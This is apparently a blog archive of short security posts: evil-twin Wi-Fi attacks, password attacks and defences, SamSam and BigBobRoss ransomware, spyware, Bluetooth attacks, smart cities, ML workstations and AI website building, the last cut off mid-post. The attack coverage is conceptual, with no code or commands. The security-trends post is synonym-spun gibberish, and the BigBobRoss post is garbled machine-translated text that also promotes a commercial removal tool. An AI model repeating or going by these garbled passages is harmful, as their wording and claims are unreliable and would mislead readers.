Now, let's say that the person using the client device that has just been connected to the attacker’s access point wants to access their online bank account. As they won't get to know that their device is actually connected to some other access point, they would unsuspectingly browse to their bank's online website and login into their online bank account. As soon as they enter their credentials into the input fields and click on submit, the credentials will flow through the attacker's access point, at which point the attacker would intercept those credentials by using some sniffing tool. The victim won't get to know what had happened, and they would still get logged into their online bank account which they would then continue to use as they would normally do. The attacker could now either decide to just be done with the attack and use the stolen credentials to login into the victims account themselves, or they could choose to continue sniffing and intercepting more information. As the rogue access point that is created by the cyber-criminals becomes an apparatus that can be used for performing malicious activities, therefore, that access point is referred to as the Evil Twin of the target access point.

This type of attack can be hazardous and can become the reason for significant losses as more and more people nowadays use wireless access points to connect their devices to either a local network or the internet. Care should be taken to avoid falling into such traps.

Read More

6

June, 2019

Preventing password attacks

Bing! (Email arrives)
Bob: Hmm. Let me check the email. I wonder what it might be.
Alice: What is it about?
Bob: Oh, no! It is from my bank. They have emailed me to alert me that someone had accessed my online bank account using my username and password yesterday and had made an online funds transfer to a bank account in some other country.
Alice: Woah! Who could have your password?
Bob: I have no idea. ...
Of course, you sure don't want to get into a situation like this one. But, it is quite likely that every other person you meet is highly vulnerable to get into such trouble. This blog talks about the techniques people could use to prevent threat actors from stealing their passwords and accessing their online or local accounts.

A password is a string of characters, which has been around for a very long time and is one of the first methods to be used for the authentication of an entity. Passwords are the "something you know" factor of authentication, which is one of the 5 commonly used factors of authentication. Keeping passwords safe from snooping eyes is very important, but it can get difficult many times.

If cyber-criminals manage to steal the passwords belonging to users, they can then use those passwords to gain unauthorised access to victims' accounts and perform other malicious activities. For example, let's say that a hacker manages to steal the username and password of a victim's online bank account by using some method. The attacker can then use the stolen password to login into the victim's online bank account, and they can then use that opportunity to transfer money from the victim's bank account to their own bank account or someone else's bank account. In this way, by having the passwords of various victims, cyber-criminals can steal money from innocent people.

Another example of how much impact can be made by password attacks is if a hacker manages to steal the password for a social media website that a victim uses for personal things, such as chatting with their friends, posting photographs, etc. Adversaries can use the stolen password to login into the victim's social media website account, and once they are logged in, the attackers can cause a lot of damage either to the reputation of the victim, or they could use the online chat feature to spread malware. Whatever be the case, the impact of password attacks could be very high.

Some of the best practices that could be followed to protect your passwords from getting stolen include never sharing your password with anyone else and creating strong and complex passwords. Passwords should never be shared with anyone else because it creates a risk of the password getting leaked. Strong and complex passwords can be created by using alphanumeric characters that could be either uppercase, lowercase, or a mix of both, by using special characters, such as an asterisk (*), a pound symbol (#), etc, and by keeping the length of the passwords sufficiently long. The longer and complex a password is, the harder it would be for an attacker to crack the password.

People could also try and remember their passwords, but this is usually limited to the memorising power of human beings, which is generally very less unless one practices how to improve their memory, but that is another story in itself. To help overcome the limits of the human being memory power, it is advised that people should use password managers. Password managers help in storing all passwords in a single place so that people don't have to remember passwords by themselves. Password managers also help in creating strong and complex passwords by using various different combinations of characters and they also help in creating passwords of varying lengths. The options that can be used to create a password depend on the password manager being used. There are password managers available out there that support passwords up to a length of 128 characters.

The use multi-factor authentication should be made so that even if a threat actor steals a victim's password, they still won't be able to login into the victim's account as they would require another factor for getting authenticated. The password policies being used within organisations should also contain the duration for which a particular password would be valid and after which it would have to be changed. It is recommended that instead of storing the passwords directly, the hashes of the passwords should be stored and the database in which they are stored should be encrypted. Salting should be used to prevent password cracking using password attacks, such as rainbow table attacks. A lot of people are in the habit of not changing the default passwords of the devices that they buy, such as a router, and that can cause problems for them as cyber-criminals can easily get a hold of default passwords, and they can then scan the internet for the devices having those default passwords and use those passwords to login into the devices. After logging in, attackers can manipulate the security settings of the devices and use them for their own malicious purposes. Therefore, the default passwords for all devices should be changed as soon as the devices are first put into use.

As passwords are widely used and hackers usually try to steal victims’ passwords first, therefore, it is highly essential to protect passwords from getting into the hands of cyber-criminals.

Read More

5

June, 2019

Still relying on passwords to protect your accounts?

We all have come to a stage at which we should realise that passwords have been our best friends who have helped us protect all our online accounts, local accounts on our personal computers, smartphones, and other assets that require a password for logging in. ...
However, we should also realise that passwords are not enough to prevent threat actors from accessing our accounts and systems. This blog discusses how adversaries use various types of password attacks to steal or guess user passwords and gain access to the victims' accounts, computer systems and other password protected digital assets.

Passwords are usually a string of characters that is used to protect an IT asset, such as an online account, from unauthorised access. Passwords can be alphanumeric, uppercase, lowercase and can also include special characters like an asterisk (*), percentage symbol (%), exclamation symbol (!), etc. In total, there are five factors of authentication, which are something you know, something you have, something you are, somewhere you are, and something you do. Passwords come under the something you know factor. Users generally use a username and password pair for accessing their accounts, and this credential pair is unique to them. Along with the usernames of the users, passwords are also stored in a database. They are either stored in plaintext, which is not recommended, or they are stored in an encrypted form.

Passwords can easily be cracked if they are weak, unencrypted, or if the hashes are not generated using techniques, such as salting. One of the most common password attacks is the brute force attack in which cyber-criminals use various sets of tools to crack victims’ passwords. The attackers use the tools to test several different combinations of passwords one-by-one to guess the right password, and when the right one is found, they use that and the victim's username to log in to the victim’s computer or any other account. Apart from using software tools to perform a brute force attack, threat actors can also use hardware tools, such as USB drives that have an inbuilt computer chip that can perform keystroke injection attacks which can be used for brute forcing passwords.

Another type of password attack is a dictionary attack. In this type of attack, adversaries use several lists of common dictionary words which they use as an input in various tools to crack victims' passwords. The wordlists containing dictionary words also include multiple other variations of those dictionary words, such as c00l instead of cool, $ky instead of sky, r@inb0W instead of rainbow, and so on. There are numerous dictionary wordlists available for free on the Internet today for anyone to use. Password guessing is another attack which can simply be described by its name itself as it really only involves mere guessing of a victim's password. Attackers continuously try to guess the password by using facts about the victim, such as their birth date, spouse's birth date, name of their pet, and things like that. They also use random words for passwords and enter them into the login fields to try and gain access to the victim's account.

Passwords can be stolen as well. This can be done by using malicious software, such as a keylogging malware, by using a network traffic sniffer, by performing shoulder surfing, dumpster diving or other methods. Another type of password attack is the birthday attack in which hackers exploit the vulnerabilities that are present in the hashing algorithms used to generate the hash values of the passwords.

Similar to using a wordlist for performing a dictionary attack, attackers can use rainbow tables for cracking passwords. The difference in these two types of attacks is that in a dictionary attack, actual dictionary words are used as an input to verify a password, whereas, in a rainbow table attack the attacker tries to match the hashes contained within a rainbow table to the ones that they have stolen from a victim's database. If a hash listed in the rainbow table matches with a one that is among the stolen hashes, then the attacker can just check the string related to that particular hash. This string is included within a rainbow table next to the hash to which it is related, and as there is a very low chance of two strings having the same hash values, therefore, the string to which the matched hash belongs to would probably be the correct password of the victim's account.

Cyber-criminals can also use combinations of various password attacks to achieve their motive of cracking victims’ passwords. Password attacks are very common, and a large number of security breaches begin with attackers cracking passwords of either an employee of an organisation or someone else who has access to the company's network infrastructure..

Read More

4

June, 2019

Save me from SamSam

Ransomware attacks have been the reason for a significant number of security incidents and substantial financial losses for several organisations in the past few years. ...
Ransomware attacks are considered to be one of the most dangerous cyber-attacks of all time, and there is a great need for protecting critical systems against this type of attacks. This blog discusses the countermeasures that can be taken and the mechanisms that can be put in place to fight the SamSam ransomware and prevent severe damage from occurring.

The SamSam ransomware was first discovered in the year 2015, and it is a type of encryption ransomware that encrypts the files and folders stored on a computer system infected by the ransomware. The SamSam ransomware also displays a dialogue box instructing the victims to pay a ransom to the attackers in the form of Bitcoin (BTC) if they wanted to gain back access to their files and folders. SamSam ransomware can be customised according to an attacker’s needs. This customisability of the ransomware strain makes it a very attractive piece of malware for threat actors to use on their victims. The fact that the creators behind SamSam alter the code each time there is news about SamSam getting detected makes this ransomware a hard fish to catch. This is because even if the security companies manage to add the signatures for the current version of SamSam, they would not be able to detect the latest version as they won’t have the signature for it.

The channels through which SamSam spreads are malicious emails, drive-by downloads, etc. In incidents involving the spread of SamSam when an employee of an organisation unsuspectingly tries to download a free software from an unknown and untrusted website, certain countermeasures can be taken. One such countermeasure is making the use of Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) that take advantage of polymorphic code detection. Polymorphic code detection techniques are particularly helpful in detecting different versions of the same computer code that is being transmitted over the internet and into a target network. This type of IDS and IPS systems would help protect the network and the systems attached to it from the various versions SamSam ransomware that exist in the wild or that may get created in the future as these systems would be able to figure out that the code actually performs the same function.

An example of a cyber-attack involving SamSam is the one that happened last year in which the target was a hospital in Indiana, USA. The hospital had to pay a ransom of about $55,000 to gain back access to its systems.

Another method that can be used to reduce the impact of SamSam attacks is to create backups of all the critical data present on the computer systems, and if it is feasible, then multiple backups should be created. As most of the systems are compromised by exploiting the vulnerabilities present in RDP, so it should be taken care that RDP is adequately secured if it is being used in the network. Also, the passwords being used for RDP should be complex and strong so that attackers cannot easily crack the passwords using brute-force attacks. The passwords for any other remote access services, such as VPN, should also be complex. It should be taken care that the JBoss, Microsoft IIS, and FTP being used on the workstations and servers are continuously patched. The users should be appropriately trained and made aware of being careful while opening an email attachment and that they should only open the attachment if the source of the email is trusted. They should also be told to not download software from any untrusted and unknown websites.

Users should only be given the least privilege, as much as they need to complete their tasks. The reason for providing only the least privileges is that if the group behind the SamSam ransomware manages to compromise a particular system, then they would not be able to have access to processes that require elevated privileges to be accessed, and they won’t be able to traverse vertically within the network. As an extra layer of security, antivirus, antimalware and other endpoint protections solutions should be used to prevent SamSam from infecting computer systems and being spread to other systems in the same network.

By March 2018, the crooks behind the SamSam ransomware had earned about $850,000 through ransom. If this does not awaken organisations to implement proper security controls to protect themselves against SamSam, then who knows what would. SamSam is a grave threat, which needs to be stopped immediately before more damage is caused. Hospitals should be the first ones to put security mechanisms against SamSam into immediate effect.

Read More

3

June, 2019

SamSam ransomware attack

It is 2019, and we are still fighting ransomware. It has been a long time since ransomware became one of the major cyber threats causing massive damage to its targets. ...
There are numerous strains of ransomware out in the wild with each one having different abilities than the other. Every new variant that has been created by threat actors has been more dangerous than the previous one. This blog talks about a specific strain of ransomware called the SamSam ransomware and how adversaries use this ransomware malware to attack their victims and cause damage.

Ransomware is a type of malware that can be used by attackers to infect target computer systems. It can be spread via email attachments, fake drive-by downloads, or via other online methods that can be used to fool a victim into downloading the ransomware onto their computer systems. Once the ransomware malware gets onto a target system, it starts to infect all the files and folders stored on that computer system. Generally, a ransomware malware achieves this task by encrypting all the files and folders stored on the system using various cryptographic algorithms. The attack doesn’t just stop there. After encrypting all the files and folders, the ransomware displays a dialogue box on which a message asking for ransom money is written. In this way, the attackers threaten the victims that they will lose access to all their files and folders if they did not pay the ransom money. However, it is not guaranteed that even after paying the ransom that the victims will ever get back the access to their data. The money given to the threat actors cannot even be traced because of the clever idea of the attackers of asking for the payment in Bitcoin or another untraceable cryptocurrency. This type of attack is performed using encryption ransomware.

SamSam is one of the several strains of ransomware that adversaries use to steal money from their victims and cause chaos. It is a type of encryption ransomware and is considered to be the most dangerous ransomware strains out there for healthcare organisations such as hospitals. SamSam ransomware is also known as Samas or SamsamCrypt. It was discovered in the year 2015, and many professionals believe that its creators lived somewhere in Europe. SamSam is a highly customisable ransomware that is privately developed according to the needs of the threat actors who want to use it. There are also frequent updates rolled out for SamSam ransomware so that it can be made to evade detection by antivirus software or other types of detection or prevention solutions. The creators of SamSam continuously look out for any incidents involving SamSam and if they find that any security company has updated the signatures of their antivirus software to include the SamSam signatures, then they immediately create a new version of SamSam and spread it across the internet so that the new version can infect targets as its signatures won't be available in the antivirus.

SamSam mainly targets public facing servers and exploits the vulnerabilities present in JBoss, FTP, Microsoft IIS, Remote Desktop Protocol (RDP), and Virtual Private Network (VPN) access with the most exploited target being RDP. It exploits these vulnerabilities to compromise systems and get a firm hold inside the target network. SamSam then starts infecting the compromised systems and encrypts the files and folders present on the target systems. It then asks for payment from the victims in Bitcoin (BTC). The dialogue box that appears on the screen of the victims displays instructions for the victims to follow to get the private keys for decrypting their data. The message even says that the victims can pay up for a few systems to see the honesty of the cyber-criminals.

SamSam ransomware has been the reason for a large number of ransomware attacks since it was first discovered, and hence, there is a need to protect critical systems against this particular strain of ransomware.

Read More

13

May, 2019

Building A Smart City

First, there were smartphones, then smart houses. Now, the smart city is the next disruptive "smart" move. As work, life, and society become increasingly connected through the wide adoption of the Internet of Things (IoT) devices, ...
it is a natural progression to build smart cities that leverage tech to provide benefits such as convenience and efficiency.

What makes smart cities so interesting is that they're not necessarily just about technology. The city is the heart of an economy from which work, school, retail, entertainment, and social life pulsate. By connecting the city in new ways, it becomes smarter and more capable of responding quickly to the changing (and growing) needs of those living and working within its boundaries.

The evolution of smart cities also provides opportunities to address some of the key challenges faced by urban areas, such as making room for affordable housing, improving transportation systems, and leveraging available data to create safer neighborhoods and streets.

Naveen Rajdev, Chief Marketing Officer of Wipro Limited, a leading global information technology, consulting and business process services company, notes that there are two important points around which to frame your smart city planning. "You don't want to show the proverbial slip of your smart city, and you don't want to overwhelm your citizens with too much tech," says Rajdev. "Keep your city's technology autonomous and discreet and take advantage of the Things and AI Internet to help you do it."

Building a smart city must hinge on one purpose. This purpose must then align with functionality and features that help citizens. Many cities have discovered that they should start with specific initiatives rather than attempting to transform an entire urban space into one large project.Building a smart city helps benchmark other cities. For example, through its Project Green Light program, Detroit has added "invisible" technology to enhance citizen safety.

The program evolved from a partnership between city officials, police, Comcast, and local businesses. Smart technology helps to unobtrusively monitor and discourage criminal activity. Businesses can install police-monitored cameras to track criminal activity. Businesses using the technology have experienced a 50 percent drop in violent crime. These include gas stations and convenience stores, often targeting armed robbery.

Finally, funding is an inescapable component of building a smart city. Although funding may come from city coffers, the cost of such projects can quickly outstrip what is available. A Deloitte report on financing smart cities recommends fiscal incentives such as tax reductions and qualified infrastructure bonds focused on smart city requirements. Investment in the private sector can also reduce near-term costs, while performance-based revenue sharing approaches can encourage more investment money to be spent on smart city projects. Finally, federal, state, and local collaboration can generate more efficient implementation of large-scale projects in funding smart city initiatives.

Building a smart city requires careful planning and collaboration with numerous stakeholders, including the general public. There must be a purpose that frames each technology and program, and this purpose should be linked back to specific goals. These goals may include reducing energy consumption, improving driver safety, or lowering crime potential. As smart cities are a new phenomenon, there will be challenges and mistakes.

Not every city can follow the same smart city transformation blueprint. However, it helps study other smart city initiatives to learn what works and what doesn't. From there, a city can develop a big-picture strategy and step-by-step projects linked to buy-in goals, budget, and stakeholders.

Read More

11

May, 2019

Are they spying on me?

Different types of malware exist out in the wild, among which some are very dangerous if used to attack a victim. ...
This blog talks about the spyware malware, which attackers can use to spy on their targets and also cause severe damage to the victims.

Let's take the example of Bob, who is the Chief Technology Officer at a company. Bob recently attended a company meeting in which all the executives, trustees and the board of directors were present. The meeting was about how the company plans on securing one of its hot sites that is located in another state within the country. The next day, Bob received an email message with an audio file attached to it. Wondering what it might be, Bob opened the attachment to listen to what the audio file contained, and he was shocked about the contents of the audio. The audio contained the full conversation that happened among everyone who attended the company meeting. Bob became a victim of a cyber-attack, which in turn, also made his company a victim as the information in the stolen conversation could be used to attack the company's hot site which was in discussion and cause damage to the company. This could also cause Bob's job to be in jeopardy as there has been a leakage of sensitive information about the company that he works for.

In this attack, the threat actor somehow installed a spyware malware onto Bob's phone and managed to record the meeting conversation via the microphone present on Bob's phone. A hot site is a backup site and is used if the operations of the company's main site are disrupted by a disaster. If the attackers compromise the hot site and then attack the main site and destroy the data, then the company could face a great deal of losses as their business operations would get disrupted due to the attack and they won't be able to serve their customers. So, this was a little glimpse of the impact that a company would have to face due to a spyware attack, the primary victim of which was an employee of the company.

Now, imagine spyware being used to infiltrate a government organisation. Attackers could install it on the devices owned by the personnel of the government organisation, or they could hack into the organisation's network and install it on the devices present within the network. The damage caused could be massive, and the information about a specific country's critical infrastructure could be stolen. If there is a spyware attack on a defence organisation, then it could put the whole nation's security in danger because if the attackers manage to steal information, such as military secrets, weapon designs, tactics information, or defensive plans, they could either use that information to orchestrate further attacks, or they could sell that information to terrorist organisation's or to another country, which could become the reason for other types of attacks. These attacks could include army raids by other countries, bomb explosions by terrorist groups, or physical attacks on critical government infrastructure as the threat actors would know about all the defensive plans and locations of the security personnel.

Spyware is a lethal type of malware that is used by a lot of cyber-criminals for causing damage to their targets, and this should raise a significant concern regarding the protective measures against spyware. This issue should also push the security community into creating security controls that can prevent spyware from infiltrating electronic devices causing mischief.

Read More

10

May, 2019

BigBobRoss Ransomeware:

BigBobRoss Ransomware is a ransomware encription trojan, a malware threat intended to compromise the files of the victims to claim the victim's payment. ...
Encryption ransomware Trojans increasingly carry out a famed attack pattern and lock the files of victims through strong encoding algorithms and require a ransom payment via Bitcoin or other digital device.The BigBobRoss ransomware was found to attack computer users for the first time in early March.
While such attacks are usually unable to be recovered, a decryption utility can help users to restore files which have been affected by a BigBobRoss Ransomware attack at present.It blocks access to victim data, as with most programs of this type without the payment of lump sums. This is a new variant of ransomware (Avast decrypted the previous version and so the cyber criminals released BigBobRoss). BigBobRoss has two variants, both adding various extensions for encrypted files.

First in January, the virus was detected. More recent activity shows however that other releases, like .djvu and .. ecryptedALL, have changed the first version of the program. Remember that the ransom does not need to be paid or contacted because the information and money loss can result.
BigBobRoss ransomware has been called different names because it is not like other developers that have their product names marked. Offered was based on an e-mail in the ransom message on the file marker and BigBobRoss.

How the BigBobRoss Ransomeware infects a computer:

Threats such as BigBobRoss Ransomware encrypt victims ' files and delete System Restore Points, Shadow Volume Copies and other data which can be used to restore data to computer users following an attack.Mainly by using corrupted spam e-mail attachments and social technology the BigBobRoss Ransomware and similar threats spread to computer users is tried to download files using unsafe scripts, that install threats such as BigBobross Ransomware.
After the installation of BigBobRoss Ransomware, it works in the background, scans the victim's computer with user-generated files and encrypts them with a strong encryption algorithm.

The following file extensions can include threats like BigBobRoss Ransomware which target a variety of file types.
jpg, .jpeg, .raw, .tif, .gif, .png, .bmp, .3dm, .max, .accdb, .db, .dbf, .mdb, .pdb, .sql, .dwg, .dxf, .cpp, .cs, .h, .php, .asp, .rb, .java, .jar, .class, .py, .js, .aaf, .aep, .aepx, .plb, .prel, .prproj, .aet, .ppj, .psd, .indd, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .xqx, .ai, .eps, .ps, .svg, .swf, .fla, .as3, .as, .txt, .doc, .dot, .docx, .docm, .dotx, .dotm, .docb, .rtf, .wpd, .wps, .msg, .pdf, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .wav, .mp3, .aif, .iff, .m3u, .m4u, .mid, .mpa, .wma, .ra, .avi, .mov, .mp4, .3gp, .mpeg, .3g2, .asf, .asx, .flv, .mpg, .wmv, .vob, .m3u8, .dat, .csv, .efx, .sdf, .vcf, .xml, .ses, .qbw, .qbb, .qbm, .qbi, .qbr , .cnt, .des, .v30, .qbo, .ini, .lgb, .qwc, .qbp, .aif, .qba, .tlg, .qbx, .qby , .1pa, .qpd, .txt, .set, .iif, .nd, .rtp, .tlg, .wav, .qsm, .qss, .qst, .fx0, .fx1, .mx0, .fpx, .fxr, .fim, .ptb, .ai, .pfb, .cgn, .vsd, .cdr, .cmx, .cpt, .csl, .cur, .des, .dsf, .ds4, , .drw, .eps, .ps, .prn, .gif, .pcd, .pct, .pcx, .plt, .rif, .svg, .swf, .tga, .tiff, .psp, .ttf, .wpd, .wpg, .wi, .raw, .wmf, .txt, .cal, .cpx, .shw, .clk, .cdx, .cdt, .fpx, .fmv, .img, .gem, .xcf, .pic, .mac, .met, .pp4, .pp5, .ppf, .nap, .pat, .ps, .prn, .sct, .vsd, .wk3, .wk4, .xpm, .zip, .rar.

BigBobRoss Ransomware makes the compromised files easy to recognize since BigBobRoss Ransomware adds the ".obsfucated" file extension to the file's name at its end. The BigBobRoss Ransomware releases its ransom note as a text file named ' Read Me.txt ' which requires the victim to contact criminals by e-mail to get the decryption key.Contacting or making any payment with criminals responsible for BigBobRoss Ransomware allows such criminals to continue to take advantage of Ransomware and develop new malware threats.
They try to trick people through official and legitimate presentation of their emails to open these attachments. Upon opening an enclosed file, ransomware (or any other high risk viruses) will be downloaded and installed. Trojans are programs only if they are installed that cause computer infections.When installed, ransomware and other malicious programs are downloaded and installed. Tools that are frequently used for free activation of paid software, rather than activating any program or operating system, download and install malicious software
Various third-party downloaders may cause computer infection when downloaded from unofficial, free file hosting or download pages, via Peer-to-Peer networks (torrent clients or EMule). Cyber criminals are often legitimate in their malicious archives.They allow different infections to be installed when people download and open them. Unofficial software updators often download and install viruses instead of fixing bugs or updating software. Sometimes, by using outdated software bugs and defects, infection occurs.

How To Protect Yourself from BigBobRoss Ransomware:

If a received e-mail is of no relevance or contains an annexed file, it should be ignored. Do not open accessories or web links unless you are confident that it is safe. Direct links and official websites are the safest way to download the software. No trust should be made for any of the tools / sources mentioned in the paragraph above, which are often used to multiply various rogue applications that might lead to computer infections.
The software installed should be updated with only official software developer tools or implemented functions. Cracking software tools cause and are illegal tools for computer infection.You ought not to use them. By having well-known antivirus / anti-spyware installed and activated at all times, protect your computer against different threats.We recommend using the Scan with Spyhunter for Windows to remove this ransomware if your computer is previously infected with BigBobRoss.

Instant Automatic Removal Of BigBobRoss Ransomeware:

Manual removal of threats could be a long and complicated process requiring advanced computer skills. Spyhunter is an automated professional malware removal tool recommended to remove BigBobRoss virus. Click the button below to download it:
Windows XP and 7 users: In Safe Mode, launch your computer. Click Start, Click Down on Shut, Click Reboot, Click OK. Press the F8 key on your keypad many times during your computer start process until you have seen an advanced option menu in the Windows menu, then select Networking Safe Mode.
Start Windows 8 users: Start Windows 8 is Network Safety mode-Go to Start Screen Windows 8, type Advanced, select Settings from the search results. Click Advanced Startup options, select Advanced Startup from the Open "General PC Settings" window. Click on the button "Start Now." Now you will restart your computer in "Advanced Startup Menu." Press the button "Trubleness," then click the button "Andvanced options." Click "Startup Settings" on the advanced option screen.
Click the button "Restart." In the Startup Settings screen your PC will restart. To boot with Networking in Safe Mode, press F5.
Windows 10 user: : Select the power icon by clicking the Windows logo. Click on the "Restart" button in the open menu and hold "Shift" on your keyboard. In the window, click on the "Choose an Option" button ; next choose the "Advanced Options" button.Select "Startup Settings" from the Advanced Options menu and click "Start again." Click "F5" on your keyboard in the following window. This restarts your system in safe networking mode.

Read More

09

May, 2019

How secure is my Bluetooth device?

Bob: Hey! What song are you listening to?
Alice: It's Demiurge by Meshuggah.
Bob: Could you share it with me?
Alice: Yes. Sure, turn on your Bluetooth.
...
Alice: Here you go. Bob: Thank you! Let me play it on my phone. Nice! Alice: You are welcome. Enjoy! (Bob forgets to turn his phone’s Bluetooth off and gets on a metro train)
The next thing he sees on his phone after getting off the metro train is that all his data has been wiped. He gets his phone checked and finds out that someone used Bluetooth to connect to his device and wiped all his data. Now the attacker could have also, first, stolen important data from his phone and they may have then erased it. In any case, Bob became a victim of a cyber-attack that used the Bluetooth technology on Bob's phone to cause damage. This blog discusses the various ways Bluetooth technology present in different types of devices can be used by threat actors to orchestrate multiple types of Bluetooth attacks and cause damage to their target victims.

Bluetooth is a technology that has been around for more than 20 years now, and the first ever consumer targeted Bluetooth-based device was launched in the year 1999. Bluetooth is a technology that is usually used for transmitting and receiving data over a short distance wirelessly. It uses Ultra High Frequency radio signals in the 2.4 GHz to 2.485 GHz radio bands. Personal Area Networks (PANs) can be easily created using Bluetooth technology. Usually, 7 devices can be connected to a single device via Bluetooth. The devices that connect to each other can both interchangeably act as the master device, which is the device that sends commands, and as the slave device, which receives the commands. Nowadays, almost all smartphones, tablets, desktops and laptops have Bluetooth that people can use for sharing data with others. However, Bluetooth technology is not entirely safe to use, and it can be dangerous to have it on your device. There are several different types of attacks that are possible using Bluetooth technology.

An example of a significant Bluetooth vulnerability is the BlueBorne vulnerability. This vulnerability poses a risk on the security of several operating systems that are used in desktop, IoT and mobile platforms, and it has also affected thousands of millions of devices that have Bluetooth technology built into them. By taking advantage of this serious vulnerability, adversaries can perform attacks which could allow them to gain complete access and control over victims' devices. The attacker does not even have to pair the attacking device with a victim's device which makes this attack even more severe. Attackers can steal confidential and other sensitive data from the target devices, and they could also perform other malicious activities, such as performing a Man-In-The-Middle attack or running malicious code on the target devices. Another type of Bluetooth attack is Bluesmack, which causes a Denial-of-Service of the Bluetooth service on a device. Various other kinds of attacks also exist, such as Bluebugging, Bluejacking, and Bluesnarfing. All these attacks can be used to either take control of a device using Bluetooth technology or steal sensitive data from those devices.

Hence, Bluetooth technology should be used with caution as the attacks that are possible via this attack vector are numerous. This should raise a concern among the community and measures should be taken to secure this technology and its implementation.

Read More

08

May, 2019

Starting Hardware for ML (Machine Learning) and hiring HR

Most businesses have decided that AI is critically important for their competitiveness. They don't always know yet what kind of AI, ...
. and they often don't know how and where to get started, but they are making provisions for AI in their budget. And they are asking developers to start experimenting. Larger businesses can afford to recruit skilled developers, and smaller businesses ask their current team to develop the necessary skills. We are seeing a lot of trial and error among these businesses right now, some with fear and anxiety about success in AI and Machine Learning. Nevertheless, there is also a distinct urgency that drives these companies, as they do not want to fall behind.

Developers and programmers are working hard to get a good grasp of the machine learning and deep learning (DL) frameworks, with increasing their data sets, and starting to develop models. Developers need free rein to bring this important new AI capability into the business, and the best way to achieve this is by giving them their own tools. Of course, those tools need to be suitable and strong enough for simple ML tasks to heavy-duty tasks as DL. A workstation with multiple powerful GPUs and a well-integrated, fully optimized stack is ideal for developers in this experimental stage. It allows them to get to production-scale deep learning much faster, which means that the business will start benefiting sooner from the models and algorithms they develop.

Therefore, putting an 8-GPU server in the office has scale and efficiency advantages, but it may well be unrequired infrastructure at this stage for many organizations that are just starting to develop AI models. They may simply not be utilizing all those GPUs yet, and that would be a waste of money. A 4-GPU workstation is a nice midway point-half the GPUs at half the cost of a comparable 8-GPU server. The programmers can always decide to share the workstation among themselves by remotely accessing it. That's a good model for smaller businesses-they can justify the cost, ensure maximum utilization, and build their AI models on the workstation until they are ready for prime role in the datacenter or other applications.

Acquiring personnel with AI expertise is challenging for most organizations. What can organizations that are just starting to build their foray in to AI and Machine Learning do to attract these highly sought after individuals?

True, the pool of AI talent is small. As a result, AI experts command top salaries, and they can be choosy about where and in what kind of environment they want to work. They are also very passionate about technology, and they get excited about tools that help them do their work better, faster and more flexibly. That is the reason why they want to work for the companies likes Google or for well-funded academic organizations that are building supercomputers. Having access to the best tools is an important motivation for these people.

So how do you get this talent for a smaller organization? AI experts do not want to be slowed down, waiting for a proper infrastructure model to run its research and development programs, when they know that there are tools that would allow them to do it much faster. They want to get to work right away on the stuff that really matters. A multiple GPU-accelerated workstation with a fully integrated and installed AI software stack under their desk will give them the compute power they desire. That will be a great start to get them interested in working for SME (Small and Medium Enterprise).

Read More

07

May, 2019

Trends of the security world

It has been years since the concept of security came into being, and people started to realise that they needed to protect their sensitive systems and information that those systems held. ...
. Over the years, various types of new technologies have emerged, and they have had their influence over the changes in the security industry. This blog talks about recent trends in the security industry.

Nowadays, a lot of advancement has occurred in the research behind mobile networks. By using cellular networks, one can communicate with anybody present anywhere in the world. Yet, for these versatile networks security is an exceptionally enormous concern.Nowadays, firewalls and other safety efforts are getting more permeable as individuals are utilising gadgets, for example, tablets, telephones, PC's and so forth, all of which again require additional security controls separated from those present in the applications that they utilise. We should dependably consider the security issues of these mobile networks. A ton of consideration must be taken to protect these networks as billions of people use these networks in their everyday lives. The risk of cyber-attacks on web servers and web applications to steal information or to disseminate malicious code remains still. Threat actors disperse their noxious code by means of real web servers that they hack into. However, attacks through which information is stolen by attackers are likewise a major threat. A more noteworthy accentuation on securing web servers and web applications is required. Web servers are particularly the best stage for these digital lawbreakers for stealing information. APTs (Advanced Persistent Threats) are a whole new dimension of cyber threats. Network security controls such as web traffic filtering, IDS or others have had a key influence in recognising APT threats. As adversaries become smarter and utilise more sophisticated tricks and techniques, networks security controls should be incorporated with other types of security controls for detecting various APT attacks.
Encryption techniques have also been among the recent security trends. In an encryption technique, the message or data is scrambled utilising an encryption algorithm, transforming it into a human non-readable form. Encryption is utilised to secure the data that is being transmitted or the data that is stored on a storage media. Encryption at an absolute starting point level ensures the confidentiality and integrity of data. However, more utilisation of encryption could also acquire more difficulties. IPv6 is the new Internet convention which is supplanting IPv4 which has been a spine of private networks and the Internet. Securing IPv6 isn't only an issue of porting IPv4 capacities to IPv6 but also of how it would be implemented in networks present around the world. While IPv6 is a discounted substitution in making more IP addresses available, there are some extremely essential changes to the convention which should be considered in the security policies of organisations. These days various types of organisations are gradually embracing distributed computing or cloud computing. This most recent pattern shows a major test for security professionals as malicious web traffic can circumvent customary security measures. Moreover, as more and more applications are being made present in the cloud, security controls for web applications and the various types of cloud services that are made available via the cloud likewise should be improved so that there are lower risks of loss of important data. In spite of the fact that clouds are building up their very own models, still, there are significant concerns regarding the security of the cloud and the data stored inside the cloud.

Read More

06

May, 2019

Artificial Intelligence for Website Automation

We really want to trust that the Internet is a safe place for online scams of any kind but always a "reality check" is a good thing. Artificial intelligence is a known phenomenon in today's world. Its root began to build years ago, but the tree began to grow long afterwards. ...
. Artificial intelligence is a known phenomenon in today's world. Its root began to build years ago, but the tree began to grow long afterwards. Earlier a question arose everywhere, a question that targeted every known face and name in the field of artificial intelligence.

"can artificial intelligence take over humans?"

Months ago, when our beloved google assistant made her first call to book a haircut appointment at the Google IO event, the phenomenon shaped itself into a whole new form. Everyone is convinced that artificial intelligence and now also machine learning are gaining their power for full expansion.
This made us think in every direction about automation. Why not automate the process of making the website? Website business and building processes, static websites, CMS, Drupal, Hugo, WordPress, various languages involved like HTML, JS, CSS and many more have magnified on a huge scale. Not everyone can learn everything, so implementing AI into it can change the phase of the world. There are many reasons for using artificial intelligence in website development.

A BETTER UNDERSTANDING OF WHAT CUSTOMER NEEDS

Artificial intelligence combined with machine learning to give a better review of what people on your site seem to be looking for. It also keeps a record of what they don't want, anything that creates the problem. This will create customer awareness for owners, and they will be able to improve their products. If you own an e-commerce website and you know exactly what a customer wants, you'll bear profits. Constructive use of Artificial Intelligence will bring you profit in a neater way.

MAKING SEARCHES FASTER

